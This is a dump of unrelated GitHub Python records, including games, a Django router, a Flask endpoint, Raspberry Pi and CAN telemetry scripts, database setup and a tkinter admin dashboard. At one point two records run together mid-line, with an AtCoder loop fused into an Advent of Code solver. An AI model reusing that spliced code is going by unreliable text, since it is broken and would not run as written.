1\n\t\tresult(x,y)\n\telif command in 'Xx':\n\t\tprint(\"We await your return, Hunter.\")\n\telse:\n\t\tprint(\"You have been foiled, Hunter. Try again... if you dare.\")\n\n\ndef result(x,y):\n\n\tdistance = round(math.sqrt((x-x1)*(x-x1)+(y-y1)*(y-y1)))\n\n\tif distance == 0:\n\t\tprint(\"Well played. Against all odds, you found the secret treasure.\")\n\n\tif distance > 0:\n\t\tprint(\"You are\", distance, \"spaces away from the sunken secret place.\")\n\t\tprint(\"Your current coordinates are\",x,y,\".\")\n\t\tcommand = input(\"Enter a direction such as 'N', 'S', 'E', 'W', or 'X' to exit: \")\n\n\t\tif command in 'Nn':\n\t\t\ty = y + 1\n\t\t\tresult(x,y)\n\t\telif command in 'Ss':\n\t\t\ty = y - 1\n\t\t\tresult(x,y)\n\t\telif command in 'Ee':\n\t\t\tx = x + 1\n\t\t\tresult(x,y)\n\t\telif command in 'Ww':\n\t\t\tx = x - 1\n\t\t\tresult(x,y)\n\t\telif command in 'Xx':\n\t\t\tprint(\"We await your return, Hunter.\")\n\nmenu()\n\n","repo_name":"sdaless/psychic-carnival","sub_path":"HW Batch 2/Hw3-pr1.py","file_name":"Hw3-pr1.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27736394918","text":"import os\nfrom . 
import appslist\nfrom django.conf import settings\n\nBASE_DIR = settings.BASE_DIR\nEZYBAAS_DATABASES = {\n 'production': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'ezybaas.prod.db'),\n },\n 'staging': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'ezybaas.staging.db'),\n },\n 'test': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'ezybaas.test.db'),\n },\n 'ezybaas': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'ezybaas.db'),\n }\n}\n\nDATABASE_APPS_MAPPING = {'contenttypes': 'default',\n 'auth': 'default',\n 'admin': 'default',\n 'sessions': 'default',\n 'messages': 'default',\n 'staticfiles': 'default',\n 'ezybaas': 'ezybaas',\n }\n\nclass EzyBaasDbRouter:\n\n def db_for_read(self, model, **hints):\n if model._meta.app_label == 'ezybaas':\n return 'ezybaas'\n return 'default'\n\n def db_for_write(self, model, **hints):\n if model._meta.app_label == 'ezybaas':\n return 'ezybaas'\n return 'default'\n\n def allow_relation(self, obj1, obj2, **hints):\n if (obj1._meta.app_label == 'ezybaas' and\n obj2._meta.app_label == 'ezybaas'):\n return True\n elif (obj1._meta.app_label != 'ezybaas' and\n obj2._meta.app_label != 'ezybaas'):\n return True\n return None\n\n def allow_migrate(self, db, app_label, model=None, **hints):\n if db == 'ezybaas':\n return app_label == 'ezybaas'\n elif app_label == 'ezybaas':\n return db == 'ezybaas'\n\n return True\n\n ","repo_name":"bhavik1st/ezybaas","sub_path":"core/ezybaas/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"52"} +{"seq_id":"70726995686","text":"import art\nimport random\nimport math\n\n# Define the values of different cards\ncards = {\n '1': 1,\n '2': 2,\n '3': 3,\n '4': 4,\n '5': 5,\n '6': 6,\n '7': 7,\n '8': 8,\n '9': 9,\n '10': 10,\n 'J': 10,\n 'Q': 10,\n 'K': 10,\n 'A': 11\n}\n\n# Function to draw a card for a player\ndef draw_card(player: list):\n card = random.choice(list(cards.keys()))\n player.append(card)\n\n# Function to calculate the total score of a list of cards\ndef calculate_score(cards_list: list):\n score = sum([cards[card] for card in cards_list])\n\n # Handling the value of Aces when score exceeds 21\n if score > 21:\n aces_to_be_one = math.ceil((score - 21) / 10)\n if cards_list.count(\"A\") >= aces_to_be_one:\n score -= aces_to_be_one * 10\n else:\n score -= cards_list.count(\"A\") * 10\n return score\n\n# Function to handle the dealer's turn\ndef dealer_turn(dealer_cards: list, player_cards: list):\n while calculate_score(dealer_cards) < 17:\n draw_card(dealer_cards)\n\n player_score = calculate_score(player_cards)\n dealer_score = calculate_score(dealer_cards)\n\n # Determine the winner or a draw based on scores\n if dealer_score > 21:\n print(f\"Your cards: {player_cards}, current score: {player_score}\")\n print(f\"dealer's cards: {dealer_cards}: score: {dealer_score}\")\n print(\"You win\")\n elif dealer_score > player_score:\n print(f\"Your cards: {player_cards}, current score: {player_score}\")\n print(f\"dealer's cards: {dealer_cards}, score: {dealer_score}\")\n print(\"You lose\")\n elif dealer_score == player_score:\n print(f\"Your cards: {player_cards}, current score: {player_score}\")\n print(f\"dealer's cards: {dealer_cards}, score: {dealer_score}\")\n print(\"Draw\")\n elif dealer_score < player_score:\n print(f\"Your cards: {player_cards}, current score: {player_score}\")\n 
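# the dealer stood on 17 or more but still finished below the player's total\n        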
print(f\"dealer's cards: {dealer_cards}, score: {dealer_score}\")\n print('You win')\n\n# Main game loop\ndef game():\n player_cards = random.choices(list(cards.keys()), k=2)\n dealer_cards = random.choices(list(cards.keys()), k=2)\n print(art.logo)\n\n while True:\n player_score = calculate_score(player_cards)\n\n print(f\"Your cards: {player_cards}, current score: {player_score}\")\n print(f\"Computer's first card: {dealer_cards[0]}\")\n draw = input(\"Type 'y' to get another card, type 'n' to pass: \")\n\n if draw == 'y':\n draw_card(player_cards)\n print(player_cards)\n if calculate_score(player_cards) > 21:\n print(f\"Your cards: {player_cards}, current score: {player_score}\")\n print(f\"dealer's cards: {dealer_cards}, score: {calculate_score(dealer_cards)}\")\n print(\"You lose\")\n break\n else:\n continue\n elif draw == 'n':\n if calculate_score(dealer_cards) > calculate_score(player_cards):\n print(f\"Your cards: {player_cards}, current score: {calculate_score(player_cards)}\")\n print(f\"dealer's cards: {dealer_cards}, score: {calculate_score(dealer_cards)}\")\n print(\"You lose\")\n break\n elif calculate_score(dealer_cards) <= calculate_score(player_cards):\n dealer_turn(dealer_cards, player_cards)\n break\n\n# Main loop to play the game multiple times\nwhile True:\n game()\n play_again = input(\"Would you like to play again? 'y' / 'n'\\n\")\n if play_again.lower() == 'y':\n continue\n else:\n break","repo_name":"abdallah-t/blackjack-game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26886516409","text":"import random\nfrom urllib import response\n\nfrom flask import Blueprint, jsonify, request\nfrom flask_restx import Namespace, Resource, fields\nfrom project.blueprints.media_album_blueprint import album_response_model\nfrom project.blueprints.media_playlist_blueprint import playlist_response_model\nfrom project.blueprints.media_song_blueprint import song_response_model\nfrom project.controllers.user_controller import UserController\nfrom project.helpers.helper_auth import check_token\nfrom project.helpers.helper_media import MediaRequester\nfrom project.helpers.helper_notification import send_notification\n\napi = Namespace(\n name=\"Media Home\", path=\"media/home\", description=\"Home related endpoints\"\n)\n\nhome_model = api.model(\n \"Home\",\n {\n \"songs\": fields.List(\n fields.Nested(song_response_model, required=False, description=\"Songs\")\n ),\n \"playlists\": fields.List(\n fields.Nested(\n playlist_response_model, required=False, description=\"Playlists\"\n )\n ),\n \"albums\": fields.List(\n fields.Nested(album_response_model, required=False, description=\"Albums\")\n ),\n },\n)\n\n\n@api.route(\"/\")\nclass Home(Resource):\n @check_token\n @api.response(200, \"Success\", home_model)\n def get(self, id):\n \"\"\"\n Returns 5 random songs, 5 random playlists and 5 random albums.\n They are based on the user's preferences (location and genres).\n \"\"\"\n data, status_code = MediaRequester.get(f\"home/{id}\", user_id=request.user.id)\n try:\n data[\"songs\"] = random.sample(data[\"songs\"], min(5, len(data[\"songs\"])))\n data[\"playlists\"] = random.sample(\n data[\"playlists\"], min(5, len(data[\"playlists\"]))\n )\n data[\"albums\"] = random.sample(data[\"albums\"], min(5, len(data[\"albums\"])))\n except KeyError:\n data = {\"songs\": [], \"playlists\": [], \"albums\": []}\n\n return data, 
status_code\n","repo_name":"taller2-grupo10/users-be","sub_path":"project/blueprints/media_home_blueprint.py","file_name":"media_home_blueprint.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"30942110954","text":"# RPi GPIO Pin Introduction\n\n# Written by Cole Lyman\n\n# 11.18.2021\n\n# import important thangs\nimport RPi.GPIO as GPIO\n\nfrom time import sleep\n\nGPIO.setmode(GPIO.BCM)\n\n#list of LED pins\nchannel_list = [5, 12, 21]\n\nGPIO.setup(channel_list, GPIO.OUT, initial=GPIO.LOW)\n\n#function for turning on ONLY one LED\ndef solo(lis, a, b):\n\tfor i in lis:\n\t\tif i !=a:\n\t\t\tGPIO.output(i, False)\n\t\telse:\n\t\t\tGPIO.output(i, True)\n\tsleep(b)\n\n#keep running above function, switching LEDs in the list initially defined\nwhile True:\n\tfor i in channel_list:\n\t\tsolo(channel_list, i, .25)\n","repo_name":"clyman88/Engineering_4_Notebook","sub_path":"raspberry/blink.py","file_name":"blink.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20491173214","text":"N = int(input()) #N is the amount of A_i\nl=[]\ng=[]\nfor i in range(N):\n l.append(int(input()))\n \nS=int(N*(N+1)*0.5)\nb=[x for x in set(l) if l.count(x)>1]\nif len(b)==1 :\n a=b[0]+(S-sum(l))\n print(b[0],a)\nelse:\n print('Correct')\n","repo_name":"Atcoderpractice/PAST-No.1","sub_path":"D_nishino.py","file_name":"D_nishino.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37385726113","text":"x = int(input())\n\ni = 1\nwhile True:\n if i*(i-1)//2 = lowest_score:\n return True\n # Check if every amphi is in it's place. 
If yes - we are finished\n if is_hallway_empty(hallway):\n for i, burrow in enumerate(burrows):\n if not is_burrow_in_order(burrow, i):\n return False\n if score < lowest_score:\n lowest_score = score\n return True\n return False\n\n\nconfigurations = open('configs.txt', 'w')\n\n\ndef get_distance(amphi, position, candidate, from_hallway=False, to_hallway=False):\n multiplier = energy[amphi]\n if not to_hallway:\n over_burrow = hallway_over_burrow[candidate[0]]\n if from_hallway:\n distance_to_burrow = abs(position - over_burrow)\n else:\n distance_to_burrow = abs(\n hallway_over_burrow[position[0]] - over_burrow)\n distance_to_burrow += position[1] + 1\n return multiplier*(distance_to_burrow + (candidate[1] + 1))\n distance_to_burrow = abs(candidate - hallway_over_burrow[position[0]])\n return multiplier*(distance_to_burrow + position[1] + 1)\n\n\nreason_count = 0\nmemoized_count = 0\ndone_count = 0\n# ...D.A - impossible combination\n\n\ndef is_possible_to_move_to_hallway_position(from_burrow, position, hallway, amphi):\n if is_hallway_empty(hallway):\n return True\n dest = destinations[amphi]\n if dest > position:\n for i in range(position, dest):\n if hallway[i] != '_':\n his_destination = hallway_over_burrow[destinations[hallway[i]]]\n if his_destination < position:\n return False\n else:\n for i in range(dest, position):\n if hallway[i] != '_':\n his_destination = hallway_over_burrow[destinations[hallway[i]]]\n if his_destination > position:\n return False\n walk_from = hallway_over_burrow[from_burrow]\n for i in range(walk_from, position):\n if hallway[i] != '_':\n return False\n return True\n\n\nglobal_counter = 0\n\n\nmemoized = {}\n\n\ndef move_into_hallway_or_destination(score, position, hallway, burrows, from_hallway=False):\n global lowest_score\n to_memoize = (hallway, burrows, position)\n if score in memoized.keys() and to_memoize in memoized[score]:\n return\n # print_cave(hallway, burrows)\n if from_hallway:\n can_move, candidate = is_able_to_move_to_destination(position, burrows, hallway[position], hallway, True)\n\n if can_move:\n new_score = score + get_distance(hallway[position], position, candidate, from_hallway)\n if new_score >= lowest_score:\n return\n hallway_copy = hallway.copy()\n burrows_copy = deepcopy(burrows)\n hallway_copy[position] = '_'\n burrows_copy[candidate[0]][candidate[1]] = hallway[position]\n configurations.write(str(score) + ' ' + str(new_score))\n configurations.write('\\n')\n write_cave(configurations, burrows_copy, hallway_copy)\n if check_if_done(burrows_copy, hallway_copy, new_score):\n return\n if score != 0:\n if score in memoized.keys():\n memoized[score].append(to_memoize)\n else:\n memoized[score] = [to_memoize]\n movable_amphi = get_movable_amphi(burrows_copy, hallway_copy)\n in_burrows = movable_amphi[0]\n in_hallway = movable_amphi[1]\n for burrowed in in_burrows:\n move_into_hallway_or_destination(new_score,\n burrowed, hallway_copy, burrows_copy)\n for hallwayed in in_hallway:\n move_into_hallway_or_destination(new_score,\n hallwayed, hallway_copy, burrows_copy, True)\n else:\n # If burrow has an amphi above this one - can't move\n if position[1] != 0 and burrows[position[0]][position[1] - 1] != '_':\n return\n can_move, candidate = is_able_to_move_to_destination(\n position, burrows, burrows[position[0]][position[1]], hallway)\n if can_move:\n new_score = score + \\\n get_distance(burrows[position[0]][position[1]],\n position, candidate, from_hallway)\n if new_score >= lowest_score:\n return\n hallway_copy = hallway.copy()\n 
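# mutate copies only, so sibling branches of the search still see the pre-move state\n                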
burrows_copy = deepcopy(burrows)\n burrows_copy[position[0]][position[1]] = '_'\n burrows_copy[candidate[0]][candidate[1]\n ] = burrows[position[0]][position[1]]\n configurations.write(str(score) + ' ' + str(new_score))\n configurations.write('\\n')\n write_cave(configurations, burrows_copy, hallway_copy)\n if check_if_done(burrows_copy, hallway_copy, new_score):\n return\n if score != 0:\n if score in memoized.keys():\n memoized[score].append(to_memoize)\n else:\n memoized[score] = [to_memoize]\n movable_amphi = get_movable_amphi(burrows_copy, hallway_copy)\n in_burrows = movable_amphi[0]\n in_hallway = movable_amphi[1]\n for burrowed in in_burrows:\n move_into_hallway_or_destination(new_score,\n burrowed, hallway_copy, burrows_copy)\n for hallwayed in in_hallway:\n move_into_hallway_or_destination(new_score,\n hallwayed, hallway_copy, burrows_copy, True)\n else:\n for possible in possible_positions_in_hallway:\n if hallway[possible] == '_':\n if not is_possible_to_move_to_hallway_position(position[0], possible, hallway, burrows[position[0]][position[1]]):\n continue\n hallway_copy = hallway.copy()\n hallway_copy[possible] = burrows[position[0]][position[1]]\n new_score = score + \\\n get_distance(\n hallway_copy[possible], position, possible, from_hallway, True)\n if score >= lowest_score:\n continue\n burrows_copy = deepcopy(burrows)\n burrows_copy[position[0]][position[1]] = '_'\n configurations.write(str(score) + ' ' + str(new_score))\n configurations.write('\\n')\n write_cave(configurations, burrows_copy, hallway_copy)\n if check_if_done(burrows_copy, hallway_copy, new_score):\n return\n if score != 0:\n if score in memoized.keys():\n memoized[score].append(to_memoize)\n else:\n memoized[score] = [to_memoize]\n movable_amphi = get_movable_amphi(\n burrows_copy, hallway_copy)\n in_burrows = movable_amphi[0]\n in_hallway = movable_amphi[1]\n for hallwayed in in_hallway:\n move_into_hallway_or_destination(new_score,\n hallwayed, hallway_copy, burrows_copy, True)\n for burrowed in in_burrows:\n move_into_hallway_or_destination(new_score,\n burrowed, hallway_copy, burrows_copy)\n\n\nmovable_amphi = get_movable_amphi(burrows, hallway)\nin_burrows = movable_amphi[0]\nfor burrowed in in_burrows:\n print(\"one more\")\n move_into_hallway_or_destination(0, burrowed, hallway, burrows)\n\nresult = lowest_score\n\nprint(reason_count)\nprint(memoized_count)\nprint(done_count)\nprint(\"Result: {}\".format(result))\n","repo_name":"kibartas/AOC","sub_path":"kibartas/2021/23/wip.py","file_name":"wip.py","file_ext":"py","file_size_in_byte":11840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31620714479","text":"from snapshottest.django import TestCase\n#from graphene.test import Client\nfrom django.test import Client\n\n\nclient = Client()\n\nclass APITestCase(TestCase):\n def test_api_index(self):\n \"\"\"Testing the API for /graphql/\"\"\"\n my_api_response = client.get('/graphql/')\n self.assertMatchSnapshot(my_api_response)\n","repo_name":"metakermit/hellodjangorest","sub_path":"hellodjangorest/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71460495844","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n-------------------------------------------------\r\n File Name: hadoop_model\r\n Description :\r\n Author : 潘晓华\r\n date: 
2018/10/29\r\n-------------------------------------------------\r\n\"\"\"\r\n\r\n\r\nfrom cloudsdk.models import ApiModel\r\n\r\n\r\nclass ZookeeperModel(ApiModel):\r\n    @classmethod\r\n    def get_zookeeper_info_by_user_id(cls, user_id, zone=None):\r\n        \"\"\"\r\n        Get all Zookeeper clusters of the specified user\r\n        :param user_id: user id\r\n        :param zone: region\r\n        :return: Zookeeper cluster information\r\n        \"\"\"\r\n        zookeeper_data = ApiModel.get_all(action='DescribeZookeepers', set='zookeeper_set', zone=zone,\r\n                                          params={'owner': user_id, 'status.1': 'active', 'verbose': '1'})\r\n        return zookeeper_data\r\n\r\n\r\n    @classmethod\r\n    def get_zookeeper(cls, zone=None):\r\n        \"\"\"\r\n        Get all Zookeeper clusters in the specified region\r\n        :param zone: region\r\n        :return: Zookeeper cluster information\r\n        \"\"\"\r\n        zookeeper_data = ApiModel.get_all(action='DescribeZookeepers', set='zookeeper_set', zone=zone,\r\n                                          params={ 'status.1': 'active', 'verbose': '1'})\r\n        return zookeeper_data\r\n\r\nif __name__ == '__main__':\r\n    import demjson\r\n    zookeeper = ZookeeperModel()\r\n    print(demjson.encode(zookeeper.get_zookeeper_info_by_user_id(user_id = 'usr-jH1olhiH' ,zone='SHA')))","repo_name":"xhuaustc/cloud-sdk","sub_path":"cloudsdk/models/zookeeper_model.py","file_name":"zookeeper_model.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43650604297","text":"import numpy as np\nfrom digi.xbee.devices import XBeeDevice\nfrom digi.xbee.util import utils\nfrom digi.xbee.models.address import XBee64BitAddress\n\nimport time\nimport os\nimport can\nfrom datetime import datetime\n#Setup can0 on rpi with these parameters\nos.system('sudo ip link set can0 type can bitrate 500000')\nos.system('sudo ifconfig can0 up')\n\n\n# TODO: Replace with the serial port where your local module is connected to.\n#PORT = \"/dev/ttyUSB0\" a\nPORT = \"/dev/ttyUSB0\" \n# TODO: Replace with the baud rate of your local module. 9600 for S3B Xbee\nBAUD_RATE = 9600 \n\ntxCount = 0\nfilters = [\n    {\"can_id\":0x121,\"can_mask\":0x7FF,\"extended\":False}, #1\n    {\"can_id\":0x132,\"can_mask\":0x7FF,\"extended\":False}, #2\n\n    # GPS?\n    {\"can_id\":0x175,\"can_mask\":0x7FF,\"extended\":False},#3 \n\n\n    # add \n    # Coolant Temp as clt on ECU\n    # decimal 1520 + 2 or 0x5F0 + 2\n    # on this message:Baro, MAP, MAT, CLT\n    {\"can_id\":0x5F2,\"can_mask\":0x7FF,\"extended\":False}, # 4\n\n    \n    # Fuel Pressure on Generic Sensor 1 \n    # Bunched in 1520 + 13 or 0x5F0 + D = 0x5FD\n    # +13: Sensor 1, Sens 2 (RL LINPOT), Sens 3 (RR Lin), Sens 4 (Steering Angle)\n    {\"can_id\":0x5FD,\"can_mask\":0x5FF,\"extended\":False}, # 5 \n\n    \n    # Oil Pressure as Generic 08, \n    # Bunched in 1520 + 14 or 0x5F0 + E = 0x5FE\n    # +14: Sensor 5 (FR Lin), Sens 6 (FL Lin), Sens 7 \n    {\"can_id\":0x5FE,\"can_mask\":0x5FF,\"extended\":False}, # 6\n\n    # Oil Temp as Generic 09\n    # Bunched in 1520 + 15 or 0x5F0 + F = 0x5FF\n    # +15: Sensor 9, Sens 10 (accX), Sens 11 (accY), Sens 12 (accZ):\n    {\"can_id\":0x5FD,\"can_mask\":0x5FF,\"extended\":False}, # 7\n\n    \n    \n]\ncan0 = can.interface.Bus(channel = 'can0', bustype = 'socketcan', bitrate=500000,can_filters=filters)\n\n\ndef main():\n    print(\" +------------------------------------------------+\")\n    print(\" |  VMS Telemetry System - install before flight  |\")\n    print(\" +------------------------------------------------+\\n\")\n    device = XBeeDevice(PORT, BAUD_RATE)\n    device.open()\n    print(\"Found Device! 
Node_ID\",utils.hex_to_string(device.get_pan_id()))\n print(device.get_16bit_addr(),\" opened\")\n txCount = 0\n\n while(True):\n xbee_network = device.get_network()\n remote_device = xbee_network.discover_device(\"Coordinator\")\n print(xbee_network.get_devices())\n if( remote_device is None):\n print(\"Could not discover <>; retrying\")\n else:\n break\n \n lastTime = time.time()\n #return \n Blocking = 0;\n MAXBlock = 20;\n\n while(True):\n data = bytearray([])\n for i in range(MAXBlock):\n msg=can0.recv()\n #print(msg.arbitration_id)\n arb = msg.arbitration_id\n if(arb == 289): # 0x121\n msg.data.insert(0,1)\n '''\n t_s = datetime.fromtimestamp(msg.timestamp)\n s = [\"{0:02x}\".format(m) for m in msg.data]\n sample = ' '.join(s)\n sample = \"0x{0:02x} \".format(msg.arbitration_id) + sample + \" \" + str(msg.timestamp)\n sample = \" Frame:\" + str(txCount%MAXBlock) +\" => \" +sample\n print(\"\\t\",t_s.minute,t_s.second,t_s.microsecond,\"ID 0x{0:02x}\".format(msg.arbitration_id),sample)\n '''\n data.extend(msg.data)\n txCount = txCount + 1;\n \n elif(arb == 306): # 0x132 \n msg.data.insert(0,2)\n data.extend(msg.data)\n txCount = txCount + 1;\n elif(arb == 373): # 0x175 \n msg.data.insert(0,3)\n data.extend(msg.data)\n txCount = txCount + 1;\n elif(arb == 1522): # Coolant 0x5F2 \n msg.data.insert(0,4)\n data.extend(msg.data)\n txCount = txCount + 1;\n elif(arb == 1533): # Fuel Press 0x5FD \n msg.data.insert(0,5)\n data.extend(msg.data)\n txCount = txCount + 1;\n elif(arb == 1534): # Oil Pressure 0x5FE \n msg.data.insert(0,6)\n data.extend(msg.data)\n txCount = txCount + 1;\n elif(arb == 1535): # Oil Temp 0x5FF \n msg.data.insert(0,7)\n data.extend(msg.data)\n txCount = txCount + 1;\n\n else:\n print(\"Unknown CAN Arbitration ID:\",msg.arbitration_id)\n\n device.send_data(remote_device,data)\n\n if(txCount%100==0):\n newTime = time.time()\n print(txCount,\" messages sent. 
Last 100 time=>\",newTime - lastTime)\n lastTime = newTime\n\nif __name__ == '__main__':\n main()\n","repo_name":"ianre/VMS-Telemetry-V2","sub_path":"on-board-filters.py","file_name":"on-board-filters.py","file_ext":"py","file_size_in_byte":4682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12245163737","text":"import psycopg2\nfrom misc import connect\n\n\nif __name__ == '__main__':\n conn = connect()\n\n commands = (\n \"\"\"DROP TABLE IF EXISTS clients CASCADE\"\"\",\n \"\"\"DROP TABLE IF EXISTS accounts CASCADE\"\"\",\n \"\"\"DROP TABLE IF EXISTS routers CASCADE\"\"\",\n \"\"\"DROP TABLE IF EXISTS internet_tariffs CASCADE\"\"\",\n \"\"\"DROP TABLE IF EXISTS tv_tariffs CASCADE\"\"\",\n \"\"\"DROP TABLE IF EXISTS servers CASCADE\"\"\",\n \"\"\"DROP TABLE IF EXISTS owned_servers CASCADE\"\"\",\n \"\"\"DROP TABLE IF EXISTS contracts CASCADE\"\"\",\n \"\"\"\n CREATE TABLE clients (\n client_id SERIAL PRIMARY KEY,\n phone_number TEXT NOT NULL,\n first_name TEXT NOT NULL,\n last_name TEXT NOT NULL,\n passport_data CHAR(10) NOT NULL,\n address TEXT NOT NULL\n )\n \"\"\",\n \"\"\" CREATE TABLE accounts (\n account_id SERIAL PRIMARY KEY,\n login TEXT NOT NULL,\n pass_hash TEXT NOT NULL,\n creation_date DATE NOT NULL,\n is_admin BOOL NOT NULL,\n client_id INTEGER,\n FOREIGN KEY (client_id)\n REFERENCES clients (client_id)\n ON UPDATE CASCADE ON DELETE CASCADE\n )\n \"\"\",\n \"\"\"\n CREATE TABLE routers (\n router_id SERIAL PRIMARY KEY,\n price INTEGER NOT NULL,\n wifi_standard TEXT NOT NULL,\n model TEXT NOT NULL,\n frequencies TEXT NOT NULL,\n ports TEXT NOT NULL\n )\n \"\"\",\n \"\"\"\n CREATE TABLE internet_tariffs (\n tariff_id SERIAL PRIMARY KEY,\n name TEXT NOT NULL,\n speed INTEGER NOT NULL,\n price INTEGER NOT NULL\n )\n \"\"\",\n \"\"\"\n CREATE TABLE tv_tariffs (\n tariff_id SERIAL PRIMARY KEY,\n name TEXT NOT NULL,\n channels INTEGER NOT NULL,\n price INTEGER NOT NULL,\n hd_channels INTEGER NOT NULL\n )\n \"\"\",\n \"\"\"\n CREATE TABLE servers (\n server_id SERIAL PRIMARY KEY,\n price INTEGER NOT NULL,\n cpu TEXT NOT NULL,\n ram TEXT NOT NULL\n )\n \"\"\",\n \"\"\"\n CREATE TABLE owned_servers (\n o_server_id SERIAL PRIMARY KEY,\n location TEXT NOT NULL,\n server_id INTEGER NOT NULL,\n FOREIGN KEY (server_id)\n REFERENCES servers (server_id)\n ON UPDATE CASCADE ON DELETE CASCADE\n )\n \"\"\",\n \"\"\"\n CREATE TABLE contracts (\n contract_id SERIAL PRIMARY KEY,\n date DATE NOT NULL,\n account_id INTEGER NOT NULL,\n router_id INTEGER,\n tariff_id INTEGER,\n tv_tariff_id INTEGER,\n server_id INTEGER,\n FOREIGN KEY (account_id)\n REFERENCES accounts (account_id)\n ON UPDATE CASCADE ON DELETE CASCADE,\n FOREIGN KEY (router_id)\n REFERENCES routers (router_id)\n ON UPDATE CASCADE ON DELETE CASCADE,\n FOREIGN KEY (tariff_id)\n REFERENCES internet_tariffs (tariff_id)\n ON UPDATE CASCADE ON DELETE CASCADE,\n FOREIGN KEY (tv_tariff_id)\n REFERENCES tv_tariffs (tariff_id)\n ON UPDATE CASCADE ON DELETE CASCADE,\n FOREIGN KEY (server_id)\n REFERENCES servers (server_id)\n ON UPDATE CASCADE ON DELETE CASCADE\n )\n \"\"\"\n )\n try:\n cur = conn.cursor()\n # create table one by one\n for command in commands:\n cur.execute(command)\n # close communication with the PostgreSQL database server\n cur.close()\n # commit the changes\n conn.commit()\n print('Created tables: Clients, Accounts, Routers, '\n 'Internet_tariffs, TV_Tariffs, Servers, Owned_servers, Contracts')\n except (Exception, psycopg2.DatabaseError) as error:\n 
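# --- Illustrative aside (not part of the original dataset record) ------------
# The try/commit/close dance above can be compressed with psycopg2's context
# managers: `with conn:` commits on success and rolls back on error, and
# `with conn.cursor() as cur:` closes the cursor automatically. A minimal
# sketch, assuming `conn` and `commands` as defined in the record:
def create_tables(conn, commands):
    with conn:                      # transaction: commit on exit, rollback on error
        with conn.cursor() as cur:  # cursor is closed automatically
            for command in commands:
                cur.execute(command)
# ------------------------------------------------------------------------------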
print(error)\n    finally:\n        if conn is not None:\n            conn.close()\n\n","repo_name":"antikleya/Kursach","sub_path":"DBSetup.py","file_name":"DBSetup.py","file_ext":"py","file_size_in_byte":4363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30368414654","text":"\"\"\"\nThis module produces the admin user's dashboard once they have logged in\n\nAuthor: Kevin Sunil\n\n\"\"\"\nimport tkinter as tk\nfrom tkinter import ttk\nimport admin\nimport utils\nimport viewWindow\nimport addWindow\nimport acceptWindow\nimport elevateWindow\nimport application\n\nclass AdminDashboard(tk.Frame):\n    \"\"\"\n    AdminDashboard class represents the main dashboard for the admin user.\n    \n    \"\"\"\n\n    def __init__(self, master, db_manager, username):\n        \"\"\"\n        Initializes the AdminDashboard object.\n\n        Args:\n            master (tkinter.Tk): The root window object.\n            db_manager (DatabaseManager): The database manager object.\n            username (str): The username of the admin user.\n        \"\"\"\n        super().__init__(master)\n        self.master = master\n        self.db_manager = db_manager\n        self.user = admin.Admin(username, db_manager)\n        self.elevate = True\n        if self.user.level == 5:\n            self.elevate = False\n        self.master.title(self.user.username)\n        self.master.resizable(False, False)\n        if self.elevate:\n            utils.center_window(240, 250, master)\n        else:\n            utils.center_window(240, 350, master)\n\n        # View Button\n        view_button = ttk.Button(self, text=\"View\", width=20, command=self.view)\n        view_button.pack(padx=20, pady=(30, 10))\n\n        # Add Button\n        add_button = ttk.Button(self, text=\"Add\", width=20, command=self.add)\n        add_button.pack(pady=10)\n\n        if self.elevate:\n            # Request Elevation Button\n            elevate_button = ttk.Button(self, text=\"Request Elevation\", width=20, command=self.elevate_request)\n            elevate_button.pack(pady=10)\n        else:\n            # Lock Data Button\n            lock_button = ttk.Button(self, text=\"Lock Data\", width=20, command=self.lock)\n            lock_button.pack(pady=10)\n\n            # Unlock Data Button\n            unlock_button = ttk.Button(self, text=\"Unlock Data\", width=20, command=self.unlock)\n            unlock_button.pack(pady=10)\n\n            # Accept Elevation Button\n            accept_button = ttk.Button(self, text=\"Accept Elevation\", width=20, command=self.accept_elevate)\n            accept_button.pack(pady=10)\n\n        # Logout Button\n        logout_button = ttk.Button(self, text=\"Logout\", width=20, command=self.logout)\n        logout_button.pack(pady=10)\n\n        self.pack()\n\n    def view(self):\n        \"\"\"\n        Callback function for the View button.\n        Destroys the current window and opens the view window.\n        \"\"\"\n        for widget in self.winfo_children():\n            widget.destroy()\n        self.destroy()\n        viewWindow.ViewWindow(self.master, self.db_manager, self.user, self.user.level)\n\n    def add(self):\n        \"\"\"\n        Callback function for the Add button.\n        Destroys the current window and opens the add window.\n        \"\"\"\n        for widget in self.winfo_children():\n            widget.destroy()\n        self.destroy()\n        addWindow.AddWindow(self.master, self.db_manager, self.user)\n\n    def elevate_request(self):\n        \"\"\"\n        Callback function for the Request Elevation button.\n        Destroys the current window and opens the elevate window.\n        \"\"\"\n        for widget in self.winfo_children():\n            widget.destroy()\n        self.destroy()\n        elevateWindow.ElevateWindow(self.master, 